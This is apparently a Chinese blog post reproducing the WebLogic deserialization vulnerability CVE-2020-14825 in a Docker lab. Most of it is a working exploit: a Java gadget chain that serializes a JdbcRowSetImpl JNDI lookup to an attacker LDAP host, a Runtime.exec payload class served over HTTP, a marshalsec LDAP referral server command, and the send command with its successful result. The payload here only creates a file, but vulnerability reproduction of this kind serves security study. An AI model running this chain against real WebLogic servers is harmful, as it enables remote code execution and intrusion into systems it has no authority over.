CVE-2020-14825:Weblogic反序列化漏洞復現
阿新 • • 發佈:2020-10-29
環境
docker pull ismaleiva90/weblogic12
docker images
docker run -p7001:7001 84795663769d
POC
public class exp{ // POC open calc public exp(){ try { Runtime.getRuntime().exec("touch /tmp/ok14825.txt"); } catch (Exception e) { e.printStackTrace(); } } public static void main(String[] argv){ exp e = new exp(); } }
找這些jar包真費勁
import com.sun.rowset.JdbcRowSetImpl; import com.tangosol.util.comparator.ExtractorComparator; import oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor; import org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor; import ysoserial.payloads.util.Reflections; import java.io.*; import java.util.PriorityQueue; public class CVE_2020_14825 { public static void main(String[] args) throws Exception { MethodAttributeAccessor accessor = new MethodAttributeAccessor(); accessor.setAttributeName("Timeline Sec"); accessor.setIsWriteOnly(true); accessor.setGetMethodName("getDatabaseMetaData"); LockVersionExtractor extractor = new LockVersionExtractor(accessor,""); JdbcRowSetImpl jdbcRowSet = Reflections.createWithoutConstructor(com.sun.rowset.JdbcRowSetImpl.class); jdbcRowSet.setDataSourceName("ldap://192.168.8.142:1389/#exp"); PriorityQueue<Object> queue = new PriorityQueue(2, new ExtractorComparator(extractor)); Reflections.setFieldValue(queue,"size",2); Object[] queueArray = (Object[])((Object[]) Reflections.getFieldValue(queue, "queue")); queueArray[0] = jdbcRowSet; ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(new File("cve_2020_14825.ser"))); out.writeObject(queue); out.flush(); out.close(); // readObject(); } public static void readObject() { FileInputStream fis = null; try { fis = new FileInputStream("cve_2020_14825.ser"); ObjectInputStream ois = new ObjectInputStream(fis); ois.readObject(); } catch (Exception e) { e.printStackTrace(); } } }
過程
編譯exp.java
放在python -m SimpleHTTPServer 80
下
開啟ladp服務
java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer http://192.168.8.142/#exp 1389
go
python weblogic_poc.py -u 192.168.8.142 -p 7001 -f cve_2020_14825.ser
結果
docker exec -i -t 84795663769d /bin/bash
[oracle@c6836c2a0308 base_domain]$ ls /tmp
hsperfdata_oracle ok14825.txt wlstTemporacle